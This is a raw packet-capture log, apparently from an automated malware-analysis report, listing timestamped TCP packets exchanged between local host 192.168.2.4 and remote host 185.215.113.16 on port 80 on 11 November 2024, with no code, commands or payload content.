                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940610886 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940613985 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940634012 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940640926 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940658092 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940665007 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940677881 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940687895 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940707922 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940716982 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940880060 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940891981 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940901995 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940913916 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940924883 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940927982 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940934896 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940938950 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940948963 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940952063 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940963984 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940969944 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940977097 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940985918 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940989017 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941000938 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941000938 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941015005 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941024065 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941035986 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941046953 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941047907 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941057920 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941059113 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941068888 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941077948 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941082954 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941092968 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941095114 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941111088 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941118956 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941123962 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941133976 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941144943 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941155910 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941157103 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941169024 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941169024 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941180944 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941184044 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941193104 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941205025 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941210985 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941215038 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941226006 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941227913 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941239119 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941242933 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941250086 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941262007 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941263914 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941273928 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941279888 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941286087 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941296101 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941302061 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941313028 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941320896 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941334963 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941335917 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941343069 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941346884 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941358089 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941364050 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941370010 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941380978 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941385984 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941399097 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941416025 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941741943 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941756010 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941766024 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941777945 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941781044 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941792011 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941803932 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941806078 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941816092 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941819906 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941828966 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941836119 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941842079 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941848993 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941867113 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941879988 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941888094 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941895962 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941907883 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941914082 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941921949 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941932917 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941937923 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941946030 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941955090 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941967010 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.941986084 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942017078 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942028999 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942038059 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942049026 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942058086 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942059994 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942076921 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942085028 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942086935 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942097902 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942101002 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942109108 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942112923 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942123890 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942128897 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942136049 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942140102 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942156076 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942161083 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942167997 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942183018 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942186117 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942195892 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942199945 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942213058 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942214012 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942224026 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942233086 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942236900 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942248106 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942255020 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942260027 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942264080 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942272902 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942281961 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942285061 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942296982 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942300081 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942316055 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942317963 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942334890 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942339897 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942348003 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942356110 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942358971 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942370892 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942374945 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942384005 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942388058 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942400932 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942411900 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942413092 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942425966 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942428112 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942439079 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942449093 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942457914 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942460060 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942468882 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942472935 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942478895 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942486048 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942497969 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942513943 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942528009 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942868948 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942882061 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942892075 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942904949 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942913055 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942915916 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942931890 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942940950 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942944050 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942951918 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942958117 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942969084 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942975044 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.942987919 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943007946 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943011999 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943026066 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943034887 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943044901 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943046093 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943059921 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943084002 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943224907 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943238020 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943248034 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943262100 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943269968 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943274021 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943283081 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943286896 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943299055 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943300009 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943310022 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943327904 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943331957 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943340063 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943341970 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943355083 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943357944 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943372965 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943378925 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943387032 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943392992 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943397999 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943408966 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943413019 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943419933 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943429947 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943435907 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943444967 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943449974 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943461895 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943461895 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943476915 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943476915 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943489075 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943497896 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943501949 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943514109 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943512917 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943526983 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943538904 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943547010 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943547010 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943551064 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943562984 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943567038 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943573952 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943591118 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943600893 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943605900 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943607092 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943613052 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943620920 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943624973 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943636894 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943641901 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943649054 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943655968 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943660975 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943672895 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943679094 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943691015 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943691015 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943705082 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943715096 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.943717957 CET8049762185.215.113.16192.168.2.4
